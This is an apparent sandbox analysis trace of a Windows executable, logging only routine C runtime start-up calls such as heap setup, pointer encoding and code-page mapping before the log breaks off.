# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Mar 3 2020 14:14:30 # Log Creation Date: 04.04.2020 09:47:37.292 Process: id = "1" image_name = "cusersgrujaappdatalocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cusersgrujaappdatalocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" page_root = "0x457e9000" os_pid = "0xb44" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x454" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0xb40 [0038.894] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x270ff720, dwHighDateTime=0x1d60a66)) [0038.895] GetCurrentProcessId () returned 0xb44 [0038.895] GetCurrentThreadId () returned 0xb40 [0038.895] GetTickCount () returned 0x1145226 [0038.895] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=15938371700) returned 1 [0039.089] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0039.090] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x860000 [0039.091] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0039.091] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0039.091] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0039.091] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0039.091] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0039.106] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0039.106] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0039.106] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0039.106] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0039.106] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0039.107] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0039.107] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0039.107] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0039.107] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0039.107] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0039.107] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0039.108] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0039.108] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0039.108] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0039.108] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0039.108] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0039.109] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x214) returned 0x8607d0 [0039.109] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0039.109] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0039.109] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0039.109] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0039.109] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0039.109] GetCurrentThreadId () returned 0xb40 [0039.109] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0039.109] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x800) returned 0x8609f0 [0039.110] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0039.110] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0039.110] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0039.110] SetHandleCount (uNumber=0x20) returned 0x20 [0039.110] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe\" " [0039.110] GetEnvironmentStringsW () returned 0x230558* [0039.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0039.110] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x0, Size=0x565) returned 0x8611f8 [0039.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x8611f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0039.110] FreeEnvironmentStringsW (penv=0x230558) returned 1 [0039.110] GetLastError () returned 0x0 [0039.110] SetLastError (dwErrCode=0x0) [0039.110] GetLastError () returned 0x0 [0039.111] SetLastError (dwErrCode=0x0) [0039.111] GetLastError () returned 0x0 [0039.111] SetLastError (dwErrCode=0x0) [0039.111] GetACP () returned 0x4e4 [0039.111] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x0, Size=0x220) returned 0x861768 [0039.111] GetLastError () returned 0x0 [0039.111] SetLastError (dwErrCode=0x0) [0039.111] IsValidCodePage (CodePage=0x4e4) returned 1 [0039.111] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0039.111] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0039.111] GetLastError () returned 0x0 [0039.111] SetLastError (dwErrCode=0x0) [0039.111] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0039.111] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0039.111] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0039.111] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0039.111] GetLastError () returned 0x0 [0039.111] SetLastError (dwErrCode=0x0) [0039.111] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0039.111] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0039.111] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ裾駾@Ā") returned 256 [0039.112] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ裾駾@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0039.112] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ裾駾@Ā", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0039.112] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ{\x11Õ\x91\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0039.112] GetLastError () returned 0x0 [0039.112] SetLastError (dwErrCode=0x0) [0039.112] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0039.112] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ裾駾@Ā") returned 256 [0039.112] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ裾駾@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0039.112] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ裾駾@Ā", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0039.112] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ{\x11Õ\x91\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0039.112] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x4a52a8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cusersgrujaappdatalocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe")) returned 0xa5 [0039.112] GetLastError () returned 0x0 [0039.112] SetLastError (dwErrCode=0x0) [0039.112] GetLastError () returned 0x0 [0039.112] SetLastError (dwErrCode=0x0) [0039.112] GetLastError () returned 0x0 [0039.112] SetLastError (dwErrCode=0x0) [0039.112] GetLastError () returned 0x0 [0039.113] SetLastError (dwErrCode=0x0) [0039.113] GetLastError () returned 0x0 [0039.113] SetLastError (dwErrCode=0x0) [0039.113] GetLastError () returned 0x0 [0039.113] SetLastError (dwErrCode=0x0) [0039.113] GetLastError () returned 0x0 [0039.113] SetLastError (dwErrCode=0x0) [0039.113] GetLastError () returned 0x0 [0039.113] SetLastError (dwErrCode=0x0) [0039.113] GetLastError () returned 0x0 [0039.113] SetLastError (dwErrCode=0x0) [0039.113] GetLastError () returned 0x0 [0039.113] SetLastError (dwErrCode=0x0) [0039.113] GetLastError () returned 0x0 [0039.113] SetLastError (dwErrCode=0x0) [0039.113] GetLastError () returned 0x0 [0039.113] SetLastError (dwErrCode=0x0) [0039.113] GetLastError () returned 0x0 [0039.114] SetLastError (dwErrCode=0x0) [0039.114] GetLastError () returned 0x0 [0039.114] SetLastError (dwErrCode=0x0) [0039.114] GetLastError () returned 0x0 [0039.114] SetLastError (dwErrCode=0x0) [0039.114] GetLastError () returned 0x0 [0039.114] SetLastError (dwErrCode=0x0) [0039.114] GetLastError () returned 0x0 [0039.114] SetLastError (dwErrCode=0x0) [0039.114] GetLastError () returned 0x0 [0039.114] SetLastError (dwErrCode=0x0) [0039.114] GetLastError () returned 0x0 [0039.114] SetLastError (dwErrCode=0x0) [0039.114] GetLastError () returned 0x0 [0039.114] SetLastError (dwErrCode=0x0) [0039.114] GetLastError () returned 0x0 [0039.114] SetLastError (dwErrCode=0x0) [0039.114] GetLastError () returned 0x0 [0039.114] SetLastError (dwErrCode=0x0) [0039.115] GetLastError () returned 0x0 [0039.115] SetLastError (dwErrCode=0x0) [0039.115] GetLastError () returned 0x0 [0039.115] SetLastError (dwErrCode=0x0) [0039.115] GetLastError () returned 0x0 [0039.115] SetLastError (dwErrCode=0x0) [0039.115] GetLastError () returned 0x0 [0039.115] SetLastError (dwErrCode=0x0) [0039.115] GetLastError () returned 0x0 [0039.115] SetLastError (dwErrCode=0x0) [0039.115] GetLastError () returned 0x0 [0039.115] SetLastError (dwErrCode=0x0) [0039.115] GetLastError () returned 0x0 [0039.115] SetLastError (dwErrCode=0x0) [0039.115] GetLastError () returned 0x0 [0039.115] SetLastError (dwErrCode=0x0) [0039.115] GetLastError () returned 0x0 [0039.115] SetLastError (dwErrCode=0x0) [0039.115] GetLastError () returned 0x0 [0039.116] SetLastError (dwErrCode=0x0) [0039.116] GetLastError () returned 0x0 [0039.116] SetLastError (dwErrCode=0x0) [0039.116] GetLastError () returned 0x0 [0039.116] SetLastError (dwErrCode=0x0) [0039.116] GetLastError () returned 0x0 [0039.116] SetLastError (dwErrCode=0x0) [0039.116] GetLastError () returned 0x0 [0039.116] SetLastError 